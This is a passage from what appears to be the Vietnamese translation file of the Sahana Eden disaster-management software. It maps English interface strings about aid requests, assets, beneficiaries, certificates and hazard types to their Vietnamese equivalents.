yêu cầu', 'Add Item to Shipment': 'Thêm hàng hóa vào lô hàng chuyển đi', 'Add Item to Stock': 'Thêm mặt hàng lưu kho', 'Add Item': 'Thêm hàng hóa', 'Add Job Role': 'Thêm chức năng công việc', 'Add Key': 'Thêm từ khóa', 'Add Kit': 'Thêm Kit', 'Add Layer from Catalog': 'Thêm lớp từ danh mục', 'Add Layer to this Profile': 'Thêm lớp vào hồ sơ này', 'Add Line': 'Thêm dòng', 'Add Locations': 'Thêm địa điểm mới', 'Add Log Entry': 'Thêm ghi chép nhật ký', 'Add Member': 'Thêm hội viên', 'Add Membership': 'Thêm nhóm hội viên', 'Add Message': 'Thêm tin nhắn', 'Add New Aid Request': 'Thêm yêu cầu cứu trợ mới', 'Add New Beneficiaries': 'Thêm người hưởng lợi mới', 'Add New Beneficiary Type': 'Thêm loại người hưởng lợi mới', 'Add New Branch': 'Thêm chi nhánh mới', 'Add New Cluster': 'Thêm nhóm mới', 'Add New Commitment Item': 'Thêm hàng hóa cam kết mới', 'Add New Community': 'Thêm cộng đồng mới', 'Add New Config': 'Thêm cấu hình mới', 'Add New Demographic Data': 'Thêm số liệu dân số mới', 'Add New Demographic Source': 'Thêm nguồn số liệu dân số mới', 'Add New Demographic': 'Thêm dữ liệu nhân khẩu mới', 'Add New Document': 'Thêm tài liệu mới', 'Add New Donor': 'Thêm nhà tài trợ mới', 'Add New Entry': 'Thêm hồ sơ mới', 'Add New Flood Report': 'Thêm báo cáo lũ lụt mới', 'Add New Framework': 'Thêm khung chương 
trình mới', 'Add New Image': 'Thêm hình ảnh mới', 'Add New Item to Stock': 'Thêm hàng hóa mới để lưu trữ', 'Add New Job Role': 'Thêm chức năng công việc mới', 'Add New Key': 'Thêm Key mới', 'Add New Layer to Symbology': 'Thêm lớp mới vào các mẫu biểu tượng', 'Add New Mailing List': 'Thêm danh sách gửi thư mới', 'Add New Member': 'Thêm hội viên mới', 'Add New Membership Type': 'Thêm loại nhóm hội viên mới', 'Add New Membership': 'Thêm nhóm hội viên mới', 'Add New Organization Domain': 'Thêm lĩnh vực hoạt động mới của tổ chức', 'Add New Output': 'Thêm kết quả đầu ra mới', 'Add New Participant': 'Thêm người tham dự mới', 'Add New Problem': 'Thêm vấn đề mới', 'Add New Profile Configuration': 'Thêm định dạng hồ sơ tiểu sử mới', 'Add New Record': 'Thêm hồ sơ mới', 'Add New Request Item': 'Thêm yêu cầu hàng hóa mới', 'Add New Request': 'Thêm yêu cầu mới', 'Add New Response': 'Thêm phản hồi mới', 'Add New Role to User': 'Gán vai trò mới cho người dùng', 'Add New Shipment Item': 'Thêm mặt hàng mới được vận chuyển', 'Add New Site': 'Thêm trang web mới', 'Add New Solution': 'Thêm giải pháp mới', 'Add New Staff Assignment': 'Thêm nhiệm vụ mới cho cán bộ', 'Add New Staff': 'Thêm bộ phận nhân viên', 'Add New Storage Location': 'Thêm Vị trí kho lưu trữ mới', 'Add New Survey Template': 'Thêm mẫu khảo sát mới', 'Add New Team Member': 'Thêm thành viên mới', 'Add New Team': 'Thêm Đội/Nhóm mới', 'Add New Unit': 'Thêm đơn vị mới', 'Add New Vehicle Assignment': 'Thêm phân công mới cho phương tiện vận chuyển', 'Add New Vulnerability Aggregated Indicator': 'Thêm chỉ số gộp mới đánh giá tình trạng dễ bị tổn thương', 'Add New Vulnerability Data': 'Thêm dữ liệu mới về tình trạng dễ bị tổn thương', 'Add New Vulnerability Indicator Sources': 'Thêm nguồn chỉ số mới đánh giá tình trạng dễ bị tổn thương', 'Add New Vulnerability Indicator': 'Thêm chỉ số mới đánh giá tình trạng dễ bị tổn thương', 'Add Order': 'Thêm đơn đặt hàng', 'Add Organization Domain': 'Thêm lĩnh vực hoạt động của tổ chức', 'Add Organization to Project': 'Thêm tổ chức tham gia dự án', 'Add Parser Settings': 'Thêm cài đặt cú pháp', 'Add Participant': 'Thêm người tham dự', 'Add Person to Commitment': 'Thêm đối tượng cam kết', 'Add Person': 'Thêm họ tên', 'Add Photo': 'Thêm ảnh', 'Add Point': 'Thêm điểm', 'Add Polygon': 'Thêm đường chuyền', 'Add Professional Experience': 'Thêm kinh nghiệm nghề nghiệp', 'Add Profile Configuration for this Layer': 'Thêm định dạng hồ sơ tiểu sử cho lớp này', 'Add Profile Configuration': 'Thêm hồ sơ tiểu sử', 'Add Program Hours': 'Thêm thời gian tham gia chương trình', 'Add Recipient': 'Thêm người nhận viện trợ', 'Add Record': 'Thêm hồ sơ', 'Add Reference Document': 'Thêm tài liệu tham chiếu', 'Add Request Detail': 'thêm chi tiết yêu cầu', 'Add Request Item': 'Thêm yêu cầu hàng hóa', 'Add Request': 'Thêm yêu cầu', 'Add Salary': 'Thêm mới', 'Add Salary Grade': 'Thêm bậc lương', 'Add Sender Organization': 'Thêm tổ chức gửi', 'Add Setting': 'Thêm cài đặt', 'Add Site': 'Thêm site', 'Add Skill Equivalence': 'Thêm kỹ năng tương đương', 'Add Skill Types': 'Thêm loại kỹ năng', 'Add Skill to Request': 'Thêm kỹ năng để yêu cầu', 'Add Staff Assignment': 'Thêm nhiệm vụ cho cán bộ', 'Add Staff Level': 'Thêm ngạch công chức', 'Add Staff Member to Project': 'Thêm cán bộ thực hiện dự án', 'Add Stock to Warehouse': 'Thêm hàng vào kho', 'Add Storage Location ': 'Thêm vị trí lưu trữ', 'Add Storage Location': 'Thêm vị trí lưu trữ', 'Add Sub-Category': 'Thêm danh mục cấp dưới', 'Add Survey Answer': 'Thêm trả lời khảo sát', 'Add Survey Question': 
'Thêm câu hỏi khảo sát', 'Add Survey Section': 'Thêm phần Khảo sát', 'Add Survey Series': 'Thêm chuỗi khảo sát', 'Add Survey Template': 'Thêm mẫu khảo sát', 'Add Symbology to Layer': 'Thêm biểu tượng cho lớp', 'Add Team Member': 'Thêm thành viên Đội/Nhóm', 'Add Team': 'Thêm Đội/Nhóm', 'Add Template Section': 'Thêm nội dung vào biểu mẫu', 'Add Training': 'Thêm tập huấn', 'Add Translation Language': 'Thêm ngôn ngữ biên dịch mới', 'Add Twilio Settings': 'Thêm cài đặt Twilio', 'Add Unit': 'Thêm đơn vị', 'Add Vehicle Assignment': 'Thêm phân công cho phương tiện vận chuyển', 'Add Vehicle': 'Thêm phương tiện vận chuyển', 'Add Volunteer Registration': 'Thêm Đăng ký tình nguyện viên', 'Add Volunteer to Project': 'Thêm tình nguyện viên hoạt động trong dự án', 'Add Vulnerability Aggregated Indicator': 'Thêm chỉ số gộp đánh giá tình trạng dễ bị tổn thương', 'Add Vulnerability Data': 'Thêm dữ liệu về tình trạng dễ bị tổn thương', 'Add Vulnerability Indicator Source': 'Thêm nguồn chỉ số đánh giá tình trạng dễ bị tổn thương', 'Add Vulnerability Indicator': 'Thêm chỉ số đánh giá tình trạng dễ bị tổn thương', 'Add a description': 'Thêm miêu tả', 'Add a new Assessment Answer': 'Thêm câu trả lời mới trong mẫu đánh giá', 'Add a new Assessment Question': 'Thêm câu hỏi mới trong mẫu đánh giá', 'Add a new Assessment Template': 'Thêm biểu mẫu đánh giá mới', 'Add a new Completed Assessment Form': 'Thêm mẫu đánh giá được hoàn thiện mới', 'Add a new Disaster Assessment': 'Thêm báo cáo đánh giá thảm họa mới', 'Add a new Site from where the Item is being sent.': 'Thêm Site nơi gửi hàng hóa đến ', 'Add a new Template Section': 'Thêm nội dung mới vào biểu mẫu', 'Add a new certificate to the catalog.': 'Thêm chứng chỉ mới vào danh mục', 'Add a new competency rating to the catalog.': 'Thêm xếp loại năng lực mới vào danh mục', 'Add a new membership type to the catalog.': 'Thêm loại hình nhóm hội viên mới vào danh mục', 'Add a new programme to the catalog.': 'Thêm chương trình mới vào danh mục', 'Add a new skill type to the catalog.': 'Thêm loại kỹ năng mới vào danh mục', 'Add all organizations which are involved in different roles in this project': 'Thêm tất cả tổ chức đang tham gia vào dự án với vai trò khác nhau', 'Add all': 'Thêm tất cả', 'Add new Group': 'Thêm nhóm mới', 'Add new Question Meta-Data': 'Thêm siêu dữ liệu câu hỏi mới', 'Add new and manage existing members.': 'Thêm mới và quản lý hội viên.', 'Add new and manage existing staff.': 'Thêm mới và quản lý cán bộ.', 'Add new and manage existing volunteers.': 'Thêm mới và quản lý tình nguyện viên.', 'Add new position.': 'Thêm địa điểm mới', 'Add new project.': 'Thêm dự án mới', 'Add new staff role.': 'Thêm vai trò nhân viên mới', 'Add saved search': 'Thêm tìm kiếm đã lưu', 'Add strings manually through a text file': 'Thêm chuỗi ký tự thủ công bằng file văn bản', 'Add strings manually': 'Thêm chuỗi ký tự thủ công', 'Add the Storage Location where this this Bin belongs to.': 'Thêm vị trí kho lưu trữ chứa Bin này', 'Add the main Warehouse/Site information where this Item is to be added.': 'Thêm thông tin Nhà kho/Site chứa hàng hóa đã được nhập thông tin', 'Add this entry': 'Thêm hồ sơ này', 'Add to Bin': 'Thêm vào thùng', 'Add': 'Thêm', 'Add...': 'Thêm…', 'Add/Edit/Remove Layers': 'Thêm/Sửa/Xóa các lớp', 'Added to Group': 'Nhóm hội viên đã được thêm', 'Added to Team': 'Nhóm hội viên đã được thêm', 'Address Details': 'Chi tiết địa chỉ', 'Address Type': 'Loại địa chỉ', 'Address added': 'Địa chỉ đã được thêm', 'Address deleted': 'Địa chỉ đã được xóa', 'Address updated': 
'Địa chỉ đã được cập nhật', 'Address': 'Địa chỉ', 'Addresses': 'Địa chỉ', 'Adjust Item Quantity': 'Chỉnh sửa số lượng mặt hàng', 'Adjust Stock Item': 'Chỉnh sửa mặt hàng lưu kho', 'Adjust Stock Levels': 'Điều chỉnh cấp độ hàng lưu kho', 'Adjust Stock': 'Chỉnh sửa hàng lưu kho', 'Adjustment created': 'Chỉnh sửa đã được tạo', 'Adjustment deleted': 'Chỉnh sửa đã đươc xóa', 'Adjustment modified': 'Chỉnh sửa đã được thay đổi', 'Admin Email': 'Email của quản trị viên', 'Admin Name': 'Tên quản trị viên', 'Admin Tel': 'Số điện thoại của Quản trị viên', 'Admin': 'Quản trị', 'Administration': 'Quản trị', 'Administrator': 'Quản trị viên', 'Adolescent (12-20)': 'Vị thành niên (12-20)', 'Adult (21-50)': 'Người trưởng thành (21-50)', 'Adult Psychiatric': 'Bệnh nhân tâm thần', 'Adult female': 'Nữ giới', 'Adult male': 'Đối tượng người lớn là nam ', 'Advance': 'Cao cấp', 'Advanced Catalog Search': 'Tìm kiếm danh mục nâng cao', 'Advanced Category Search': 'Tìm kiếm danh mục nâng cao', 'Advanced Location Search': 'Tìm kiếm vị trí nâng cao', 'Advanced Search': 'Tìm kiếm nâng cao', 'Advanced Site Search': 'Tìm kiếm website nâng cao', 'Advocacy': 'Vận động chính sách', 'Affected Persons': 'Người bị ảnh hưởng', 'Affiliation Details': 'Chi tiết liên kết', 'Affiliation added': 'Liên kết đã được thêm', 'Affiliation deleted': 'Liên kết đã được xóa', 'Affiliation updated': 'Liên kết đã được cập nhật', 'Affiliations': 'Liên kết', 'Age Group (Count)': 'Nhóm tuổi (Số lượng)', 'Age Group': 'Nhóm tuổi', 'Age group does not match actual age.': 'Nhóm tuổi không phù hợp với tuổi hiện tại', 'Aid Request Details': 'Chi tiết yêu cầu cứu trợ', 'Aid Request added': 'Đã thêm yêu cầu viện trợ', 'Aid Request deleted': 'Đã xóa yêu cầu cứu trợ', 'Aid Request updated': 'Đã cập nhật Yêu cầu cứu trợ', 'Aid Request': 'Yêu cầu cứu trợ', 'Aid Requests': 'yêu cầu cứu trợ', 'Aircraft Crash': 'Tại nạn máy bay', 'Aircraft Hijacking': 'Bắt cóc máy bay', 'Airport Closure': 'Đóng cửa sân bay', 'Airport': 'Sân bay', 'Airports': 'Sân bay', 'Airspace Closure': 'Đóng cửa trạm không gian', 'Alcohol': 'Chất cồn', 'Alerts': 'Cảnh báo', 'All Entities': 'Tất cả đối tượng', 'All Inbound & Outbound Messages are stored here': 'Tất cả tin nhắn gửi và nhận được lưu ở đây', 'All Open Tasks': 'Tất cả nhiệm vụ công khai', 'All Records': 'Tất cả hồ sơ', 'All Requested Items': 'Hàng hóa được yêu cầu', 'All Resources': 'Tất cả nguồn lực', 'All Tasks': 'Tất cả nhiệm vụ', 'All reports': 'Tất cả báo cáo', 'All selected': 'Tất cả', 'All': 'Tất cả', 'Allowance': 'Phụ cấp', 'Allowed to push': 'Cho phép bấm nút', 'Allows authorized users to control which layers are available to the situation map.': 'Cho phép người dùng đã đăng nhập kiểm soát layer nào phù hợp với bản đồ tình huống', 'Alternative Item Details': 'Chi tiết mặt hàng thay thế', 'Alternative Item added': 'Mặt hàng thay thế đã được thêm', 'Alternative Item deleted': 'Mặt hàng thay thế đã được xóa', 'Alternative Item updated': 'Mặt hàng thay thế đã được cập nhật', 'Alternative Items': 'Mặt hàng thay thế', 'Ambulance Service': 'Dịch vụ xe cứu thương', 'Amount': 'Tổng ngân sách', 'An Assessment Template can be selected to create a Disaster Assessment. Within a Disaster Assessment, responses can be collected and results can analyzed as tables, charts and maps': 'Mẫu đánh giá có thể được chọn để tạo ra một Đánh giá tình hình Thảm họa. 
Trong Đánh giá tình hình Thảm họa, các hoạt động ứng phó có thể được tổng hợp và kết quả có thể được phân tích dưới dạng bảng, biểu đồ và bản đồ', 'An Item Category must have a Code OR a Name.': 'Danh mục hàng hóa phải có Mã hay Tên.', 'Analysis': 'Phân tích', 'Animal Die Off': 'Động vật tuyệt chủng', 'Animal Feed': 'Thức ăn động vật', 'Annual Budget deleted': 'Ngân sách năm đã được xóa', 'Annual Budget updated': 'Ngân sách năm đã được cập nhật', 'Annual Budget': 'Ngân sách năm', 'Annual Budgets': 'Ngân sách năm', 'Anonymous': 'Ẩn danh', 'Answer Choices (One Per Line)': 'Chọn câu trả lời', 'Any available Metadata in the files will be read automatically, such as Timestamp, Author, Latitude & Longitude.': 'Thông tin có sẵn trong file như Timestamp,Tác giả, Kinh độ, Vĩ độ sẽ được đọc tự động', 'Any': 'Bất cứ', 'Applicable to projects in Pacific countries only': 'Chỉ áp dụng cho dự án trong các nước thuộc khu vực Châu Á - Thái Bình Dương', 'Application Permissions': 'Chấp nhận đơn đăng ký', 'Application': 'Đơn đăng ký', 'Apply changes': 'Lưu thay đổi', 'Approval pending': 'Đang chờ phê duyệt', 'Approval request submitted': 'Yêu cầu phê duyệt đã được gửi', 'Approve': 'Phê duyệt', 'Approved By': 'Được phê duyệt bởi', 'Approved by %(first_initial)s.%(last_initial)s': 'Được phê duyệt bởi %(first_initial)s.%(last_initial)s', 'Approved': 'Đã phê duyệt', 'Approver': 'Người phê duyệt', 'ArcGIS REST Layer': 'Lớp ArcGIS REST', 'Archive not Delete': 'Bản lưu không xóa', 'Arctic Outflow': 'Dòng chảy từ Bắc Cực', 'Are you sure you want to delete this record?': 'Bạn có chắc bạn muốn xóa hồ sơ này?', 'Arrived': 'Đã đến', 'As of yet, no sections have been added to this template.': 'Chưa hoàn thành, không mục nào được thêm vào mẫu này', 'Assessment Answer Details': 'Nội dung câu trả lời trong mẫu đánh giá', 'Assessment Answer added': 'Câu trả lời trong mẫu đánh giá đã được thêm', 'Assessment Answer deleted': 'Câu trả lời trong mẫu đánh giá đã được xóa', 'Assessment Answer updated': 'Câu trả lời trong mẫu đánh giá đã được cập nhật', 'Assessment Answers': 'Câu trả lời trong mẫu đánh', 'Assessment Question Details': 'Nội dung câu trả hỏi trong mẫu đánh giá', 'Assessment Question added': 'Câu trả hỏi trong mẫu đánh giá đã được thêm', 'Assessment Question deleted': 'Câu trả hỏi trong mẫu đánh giá đã được xóa', 'Assessment Question updated': 'Câu trả hỏi trong mẫu đánh giá đã được cập nhật', 'Assessment Questions': 'Câu trả hỏi trong mẫu đánh', 'Assessment Template Details': 'Nội dung biểu mẫu đánh giá', 'Assessment Template added': 'Biểu mẫu đánh giá đã được thêm', 'Assessment Template deleted': 'Biểu mẫu đánh giá đã được xóa', 'Assessment Template updated': 'Biểu mẫu đánh giá đã được cập nhật', 'Assessment Templates': 'Biểu mẫu đánh giá', 'Assessment admin level': 'Cấp quản lý đánh giá', 'Assessment and Community/ Beneficiary Identification': 'Đánh giá và xác định đối tượng/ cộng đồng hưởng lợi', 'Assessment timeline': 'Khung thời gian đánh giá', 'Assessment updated': 'Đã cập nhật Trị giá tính thuế', 'Assessment': 'Đánh giá', 'Assessments': 'Đánh giá', 'Asset Details': 'Thông tin tài sản', 'Asset Log Details': 'Chi tiết nhật ký tài sản', 'Asset Log Empty': 'Xóa nhật ký tài sản', 'Asset Log Entry deleted': 'Ghi chép nhật ký tài sản đã được xóa', 'Asset Log Entry updated': 'Ghi chép nhật ký tài sản đã được cập nhật', 'Asset Log': 'Nhật ký tài sản', 'Asset Number': 'Số tài sản', 'Asset added': 'Tài sản đã được thêm', 'Asset deleted': 'Tài sản đã được xóa', 'Asset updated': 'Tài sản đã được cập nhật', 'Asset': 'Tài 
sản', 'Assets are resources which are not consumable but are expected back, so they need tracking.': 'Tài sản là các nguồn lực không tiêu hao và có thể được hoàn trả nên cần theo dõi tài sản', 'Assets': 'Tài sản', 'Assign Asset': 'Giao tài sản', 'Assign Human Resource': 'Phân chia nguồn nhân lực', 'Assign New Human Resource': 'Phân chia nguồn nhân lực mới', 'Assign Role to a User': 'Phân công vai trò cho người sử dụng', 'Assign Roles': 'Phân công vai trò', 'Assign Staff': 'Phân công cán bộ', 'Assign Vehicle': 'Phân công phương tiện vận chuyển', 'Assign another Role': 'Phân công vai trò khác', 'Assign to Facility/Site': 'Phân công tới Bộ phân/ Địa bàn', 'Assign to Organization': 'Phân công tới Tổ chức', 'Assign to Person': 'Phân công tới đối tượng', 'Assign': 'Phân công', 'Assigned By': 'Được phân công bởi', 'Assigned Roles': 'Vai trò được phân công', 'Assigned To': 'Được phân công tới', 'Assigned to Facility/Site': 'Được phân công tới Bộ phân/ Địa bàn', 'Assigned to Organization': 'Được phân công tới Tổ chức', 'Assigned to Person': 'Được phân công tới đối tượng', 'Assigned to': 'Được phân công tới', 'Assigned': 'Được phân công', 'Association': 'Liên hiệp', 'At or below %s': 'Tại đây hoặc phí dưới %s', 'At/Visited Location (not virtual)': 'Địa điêm ở/đã đến (không ảo)', 'Attachments': 'Đính kèm', 'Attribution': 'Quyền hạn', 'Australian Dollars': 'Đô la Úc', 'Authentication Required': 'Xác thực được yêu cầu', 'Author': 'Tác giả', 'Auxiliary Role': 'Vai trò bổ trợ', 'Availability': 'Thời gian có thể tham gia', 'Available Alternative Inventories': 'Hàng tồn kho thay thế sẵn có', 'Available Forms': 'Các mẫu có sẵn', 'Available Inventories': 'Hàng tồn kho sẵn có', 'Available databases and tables': 'Cơ sở dữ liệu và bảng biểu sẵn có', 'Available in Viewer?': 'Sẵn có để xem', 'Available until': 'Sẵn sàng cho đến khi', 'Avalanche': 'Tuyết lở', 'Average': 'Trung bình', 'Award Type': 'Hình thức khen thưởng', 'Award': 'Khen thưởng', 'Awarding Body': 'Cấp khen thưởng', 'Awards': 'Khen thưởng', 'Awareness Raising': 'Nâng cao nhận thức', 'BACK TO %(system_name_short)s': 'TRỞ LẠI %(system_name_short)s', 'BACK TO MAP VIEW': 'TRỞ LẠI XEM BẢN ĐỒ', 'BROWSE OTHER REGIONS': 'LỰA CHỌN CÁC VÙNG KHÁC', 'Baby And Child Care': 'Chăm sóc trẻ em', 'Bachelor': 'Cửa nhân', "Bachelor's Degree": 'Trung cấp, cao đẳng, đại học', 'Back to Roles List': 'Quay trở lại danh sách vai trò', 'Back to Users List': 'Quay trở lại danh sách người sử dụng', 'Back to the main screen': 'Trở lại màn hình chính', 'Back': 'Trở lại', 'Background Color': 'Màu nền', 'Baldness': 'Cây trụi lá', 'Bank/micro finance': 'Tài chính Ngân hàng', 'Base %(facility)s Set': 'Tập hợp %(facility)s nền tảng', 'Base Facility/Site Set': 'Tập hợp Bộ phận/ Địa bàn nền tảng', 'Base Layer?': 'Lớp bản đồ cơ sở?', 'Base Layers': 'Lớp bản đồ cơ sở', 'Base Location': 'Địa điểm nền tảng', 'Base URL of the remote Sahana Eden instance including application path, e.g. 
http://www.example.org/eden': 'Đường dẫn Cơ bản của Hệ thống Sahana Eden từ xa bao gồm đường dẫn ứng dụng như http://www.example.org/eden', 'Base Unit': 'Đơn vị cơ sở', 'Basic Details': 'Chi tiết cơ bản', 'Basic information on the requests and donations, such as category, the units, contact details and the status.': 'Thông tin cơ bản về các yêu cầu và quyên góp như thể loại, tên đơn vị, chi tiết liên lạc và tình trạng', 'Basic reports on the Shelter and drill-down by region': 'Báo cáo cơ bản về nơi cư trú và báo cáo chi tiết theo vùng', 'Baud rate to use for your modem - The default is safe for most cases': 'Tốc độ truyền sử dụng cho mô đem của bạn - Chế độ mặc định là an toàn trong hầu hết các trường hợp', 'Bed Type': 'Loại Giường', 'Behaviour Change Communication': 'Truyền thông thay đổi hành vi', 'Beneficiaries Added': 'Người hưởng lợi đã được thêm', 'Beneficiaries Deleted': 'Người hưởng lợi đã được xóa', 'Beneficiaries Details': 'Thông tin của người hưởng lợi', 'Beneficiaries Updated': 'Người hưởng lợi đã được cập nhật', 'Beneficiaries': 'Người hưởng lợi', 'Beneficiary Report': 'Báo cáo người hưởng lợi', 'Beneficiary Type Added': 'Loại người hưởng lợi đã được thêm', 'Beneficiary Type Deleted': 'Loại người hưởng lợi đã được xóa', 'Beneficiary Type Updated': 'Loại người hưởng lợi đã được cập nhật', 'Beneficiary Type': 'Đối tượng hưởng lợi', 'Beneficiary Types': 'Đối tượng hưởng lợi', 'Beneficiary of preferential treatment policy': 'Là đối tượng chính sách', 'Beneficiary': 'Người Hưởng lợi', 'Better Programming Initiative Guidance': 'Hướng dẫn sử dụng tài liệu BPI', 'Bin': 'Thẻ kho', 'Bing Layer': 'Lớp thừa', 'Biological Hazard': 'Hiểm họa sinh học', 'Biscuits': 'Bánh quy', 'Blizzard': 'Bão tuyết', 'Blocked': 'Bị chặn', 'Blood Donation and Services': 'Hiến máu và Dịch vụ về máu', 'Blood Type (AB0)': 'Nhóm máu (ABO)', 'Blowing Snow': 'Tuyết lở', 'Body Recovery Requests': 'Yêu cầu phục hồi cơ thể', 'Body Recovery': 'Phục hồi thân thể', 'Body': 'Thân thể', 'Bomb Explosion': 'Nổ bom', 'Bomb Threat': 'Nguy cơ nổ bom', 'Bomb': 'Bom', 'Border Color for Text blocks': 'Màu viền cho khối văn bản', 'Both': 'Cả hai', 'Branch Capacity Development': 'Phát triển năng lực cho Tỉnh/ thành Hội', 'Branch Organization Details': 'Thông tin tổ chức cơ sở', 'Branch Organization added': 'Tổ chức cơ sở đã được thêm', 'Branch Organization deleted': 'Tổ chức cơ sở đã được xóa', 'Branch Organization updated': 'Tổ chức cơ sở đã được cập nhật', 'Branch Organizations': 'Tổ chức cơ sở', 'Branch': 'Cơ sở', 'Branches': 'Cơ sở', 'Brand Details': 'Thông tin nhãn hiệu', 'Brand added': 'Nhãn hiệu đã được thêm', 'Brand deleted': 'Nhãn hiệu đã được xóa', 'Brand updated': 'Nhãn hiệu đã được cập nhật', 'Brand': 'Nhãn hiệu', 'Brands': 'Nhãn hiệu', 'Breakdown': 'Chi tiết theo', 'Bridge Closed': 'Cầu đã bị đóng', 'Buddhist': 'Tín đồ Phật giáo', 'Budget Updated': 'Cập nhât ngân sách', 'Budget deleted': 'Đã xóa ngân sách', 'Budget': 'Ngân sách', 'Budgets': 'Ngân sách', 'Buffer': 'Đệm', 'Bug': 'Lỗi', 'Building Collapsed': 'Nhà bị sập', 'Building Name': 'Tên tòa nhà', 'Bulk Uploader': 'Công cụ đê tải lên số lượng lớn thông tin', 'Bundle Updated': 'Cập nhật Bundle', 'Bundles': 'Bó', 'By Warehouse': 'Bằng Kho hàng', 'By Warehouse/Facility/Office': 'Bằng Kho hàng/ Bộ phận/ Văn phòng', 'By selecting this you agree that we may contact you.': 'Bằng việc lựa chọn bạn đồng ý chúng tôi có thể liên lạc với bạn', 'CBDRM': 'QLRRTHDVCĐ', 'COPY': 'Sao chép', 'CREATE': 'TẠO', 'CSS file %s not writable - unable to apply theme!': 'không viết được file 
CSS %s - không thể áp dụng chủ đề', 'CV': 'Quá trình công tác', 'Calculate': 'Tính toán', 'Calculation': 'Tính toán', 'Calendar': 'Lịch', 'Camp': 'Trạm/chốt tập trung', 'Can only approve 1 record at a time!': 'Chỉ có thể phê duyệt 1 hồ sơ mỗi lần', 'Can only disable 1 record at a time!': 'Chỉ có thể vô hiệu 1 hồ sơ mỗi lần', 'Can only update 1 record at a time!': 'Chỉ có thể cập nhật 1 hồ sơ mỗi lần', 'Can read PoIs either from an OpenStreetMap file (.osm) or mirror.': 'Có thể đọc PoIs từ cả định dạng file OpenStreetMap (.osm) hoặc mirror.', 'Canadian Dollars': 'Đô la Canada', 'Cancel Log Entry': 'Hủy ghi chép nhật ký', 'Cancel Shipment': 'Hủy lô hàng vận chuyển', 'Cancel editing': 'Hủy chỉnh sửa', 'Cancel': 'Hủy', 'Canceled': 'Đã hủy', 'Cannot delete whilst there are linked records. Please delete linked records first.': 'Không xóa được khi đang có bản thu liên quan.Hãy xóa bản thu trước', 'Cannot disable your own account!': 'Không thể vô hiệu tài khoản của chính bạn', 'Cannot make an Organization a branch of itself!': 'Không thể tạo ra tổ chức là tổ chức cơ sở của chính nó', 'Cannot open created OSM file!': 'Không thể mở file OSM đã tạo', 'Cannot read from file: %(filename)s': 'Không thể đọc file: %(filename)s', 'Cannot send messages if Messaging module disabled': 'Không thể gửi tin nhắn nếu chức năng nhắn tin bị tắt', 'Capacity Building of Staff': 'Xây dựng năng lực cho Cán bộ', 'Capacity Building of Volunteers': 'Xây dựng năng lực cho Tình nguyện viên', 'Capacity Building': 'Xây dựng năng lực', 'Capacity Development': 'Nâng cao năng lực', 'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': 'Nắm bắt thông tin của các nạn nhân chịu ảnh hưởng của thiên tai(Khách du lịch,Gia đình...)', 'Card number': 'Số thẻ BHXH', 'Cardiology': 'Bệnh tim mạch', 'Cases': 'Trường hợp', 'Casual Labor': 'Nhân công thời vụ', 'Catalog Details': 'Thông tin danh mục', 'Catalog Item added': 'Mặt hàng trong danh mục đã được thêm', 'Catalog Item deleted': 'Mặt hàng trong danh mục đã được xóa', 'Catalog Item updated': 'Mặt hàng trong danh mục đã được cập nhật', 'Catalog Items': 'Mặt hàng trong danh mục', 'Catalog added': 'Danh mục đã được thêm', 'Catalog deleted': 'Danh mục đã được xóa', 'Catalog updated': 'Danh mục đã được cập nhật', 'Catalog': 'Danh mục', 'Catalogs': 'Danh mục', 'Categories': 'Chủng loại', 'Category': 'Chủng loại', 'Center': 'Trung tâm', 'Certificate Catalog': 'Danh mục chứng nhận', 'Certificate Details': 'Thông tin chứng nhận', 'Certificate List': 'Danh sách chứng nhận', 'Certificate Status': 'Tình trạng của chứng nhận', 'Certificate added': 'Chứng nhận đã được thêm', 'Certificate deleted': 'Chứng nhận đã được xóa', 'Certificate updated': 'Chứng nhận đã được cập nhật', 'Certificate': 'Chứng nhận', 'Certificates': 'Chứng nhận', 'Certification Details': 'Thông tin bằng cấp', 'Certification added': 'Bằng cấp đã được thêm', 'Certification deleted': 'Bằng cấp đã được xóa', 'Certification updated': 'Bằng cấp đã được cập nhật', 'Certifications': 'Bằng cấp', 'Certifying Organization': 'Tổ chức xác nhận', 'Change Password': 'Thay đổi mật khẩu', 'Chart': 'Biểu đồ', 'Check Request': 'Kiểm tra yêu cầu', 'Check for errors in the URL, maybe the address was mistyped.': 'Kiểm tra lỗi đường dẫn URL, địa chỉ có thể bị đánh sai', 'Check if the URL is pointing to a directory instead of a webpage.': 'Kiểm tra nếu đường dẫn URL chỉ dẫn đến danh bạ chứ không phải đến trang web', 'Check outbox for the message status': 'Kiểm tra hộp thư đi để xem tình trạng thư gửi đi', 'Check this to 
make your search viewable by others.': 'Chọn ô này để người khác có thể xem được tìm kiếm của bạn', 'Check': 'Kiểm tra', 'Check-In': 'Đăng ký', 'Check-Out': 'Thanh toán', 'Checked': 'Đã kiểm tra', 'Checking your file...': 'Kiểm tra file của bạn', 'Checklist of Operations': 'Danh sách kiểm tra các hoạt động', 'Chemical Hazard': 'Hiểm họa hóa học', 'Child (2-11)': 'Trẻ em (2-11)', 'Child Abduction Emergency': 'Tình trạng khẩn cấp về bắt cóc trẻ em', 'Children (2-5 years)': 'Trẻ em (từ 2-5 tuổi)', 'Children (< 2 years)': 'Trẻ em (dưới 2 tuổi)', 'Choose Country': 'Lựa chọn quốc gia', 'Choose File': 'Chọn file', 'Choose country': 'Lựa chọn quốc gia', 'Choose': 'Lựa chọn', 'Christian': 'Tín đồ Cơ-đốc giáo', 'Church': 'Nhà thờ', 'Circumstances of disappearance, other victims/witnesses who last saw the missing person alive.': 'Hoàn cảnh mất tích, các nạn nhân khác/nhân chứng nhìn thấy lần gần đây nhất nạn nhân còn sống', 'City / Town / Village': 'Phường/ Xã', 'Civil Emergency': 'Tình trạng khẩn cấp dân sự', 'Civil Society/NGOs': 'Tổ chức xã hội/NGOs', 'Clear filter': 'Xóa bộ lọc', 'Clear selection': 'Xóa lựa chọn', 'Clear': 'Xóa', 'Click anywhere on the map for full functionality': 'Bấm vào vị trí bất kỳ trên bản đồ để có đầy đủ chức năng', 'Click on a marker to see the Completed Assessment Form': 'Bấm vào nút đánh dấu để xem Mẫu đánh giá đã hoàn chỉnh', 'Click on the chart to show/hide the form.': 'Bấm vào biểu đồ để hiển thị/ ẩn mẫu', 'Click on the link %(url)s to reset your password': 'Bấm vào đường dẫn %(url)s khởi tạo lại mật khẩu của bạn', 'Click on the link %(url)s to verify your email': 'Bấm vào đường dẫn %(url)s để kiểm tra địa chỉ email của bạn', 'Click to dive in to regions or rollover to see more': 'Bấm để đi sâu vào vùng hoặc di chuột qua để xem thêm', 